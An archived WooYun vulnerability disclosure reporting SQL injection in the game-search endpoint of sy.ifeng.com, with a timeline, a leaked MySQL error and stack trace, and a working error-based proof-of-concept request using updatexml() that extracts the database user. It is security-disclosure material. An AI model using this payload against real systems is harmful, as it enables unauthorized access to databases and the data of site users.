乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-04: 细节已通知厂商并且等待厂商处理中 2015-03-04: 厂商已经确认,细节仅向厂商公开 2015-03-14: 细节向核心白帽子及相关领域专家公开 2015-03-24: 细节向普通白帽子公开 2015-04-03: 细节向实习白帽子公开 2015-04-18: 细节向公众公开
网站:sy.ifeng.com参数q
GET /service/searchgames?q=3'&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://g.ifeng.com/search-list.shtml?q=3Cache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: sy.ifeng.comAccept-Encoding: gzip, deflate <h3>Exception information:</h3> <p> <b>Message:</b> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or en_name like '%3'%' or categorys.category_name like '%3'%') )' at line 1 </p> <h3>Stack trace:</h3> <pre>#0 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Statement.php(300): Zend_Db_Statement_Pdo->_execute(Array)#1 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Statement->execute(Array)#2 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query(' select count(D...', Array)#3 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Abstract->query(' select count(D...', Array)#4 /data/ifengsite/htdocs/sy.ifeng.com/application/models/Game.php(459): Zend_Db_Adapter_Abstract->fetchOne(' select count(D...')#5 /data/ifengsite/htdocs/sy.ifeng.com/application/controllers/ServiceController.php(331): Model_Game->searchGames('android', Array, 'null', 'null', 0)#6 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Action.php(516): ServiceController->searchgamesAction()#7 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Dispatcher/Standard.php(295): Zend_Controller_Action->dispatch('searchgamesActi...')#8 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))#9 /data/ifengsite/htdocs/sy.ifeng.com/application/Bootstrap.php(109): Zend_Controller_Front->dispatch()#10 /data/ifengsite/htdocs/sy.ifeng.com/library/Zend/Application.php(366): Bootstrap->run()#11 /data/ifengsite/htdocs/sy.ifeng.com/public/index.php(20): Zend_Application->run()#12 {main} </pre> <h3>Request Parameters:</h3> <pre>array(7) { ["controller"]=> string(7) "service" ["action"]=> string(11) "searchgames" ["module"]=> string(7) "default" ["q"]=> string(2) "3'" ["pageindex"]=> string(4) "null" ["pagesize"]=> string(4) "null" ["jsoncallback"]=> string(12) "viewGameList"}
终于弄出来poc了,ifeng5个站搞出来一个站的poc
ET /service/searchgames?q=x'and(updatexml(1,concat(0x7e,(user()),0x7e),1))or'x&pageindex=null&pagesize=null&jsoncallback=viewGameList HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://g.ifeng.com/search-list.shtml?q=3Cache-Control: no-cacheX-Forwarded-For: 127.0.0.1Host: sy.ifeng.comCookie: PHPSESSID=helc1fc5c7bvod0e0ktb282fr6; _plst[_plid_]=2892439417; _plst[others][_pllv_]=13Accept-Encoding: gzip, deflateDate: Tue, 03 Mar 2015 12:07:34 GMTContent-Type: text/html;charset=utf-8Connection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 2597<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"; "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>å¤å°ç½æ¸¸æä¸å¿èè¿ç³»ç»</title> </head> <body> <h1>An error occurred</h1> <h2>Application error</h2> <h3>Exception information:</h3> <p> <b>Message:</b> SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '[email protected]~' </p> <h3>Stack trace:</
危害等级:高
漏洞Rank:10
确认时间:2015-03-04 13:36
非常感谢,我们正在处理。
暂无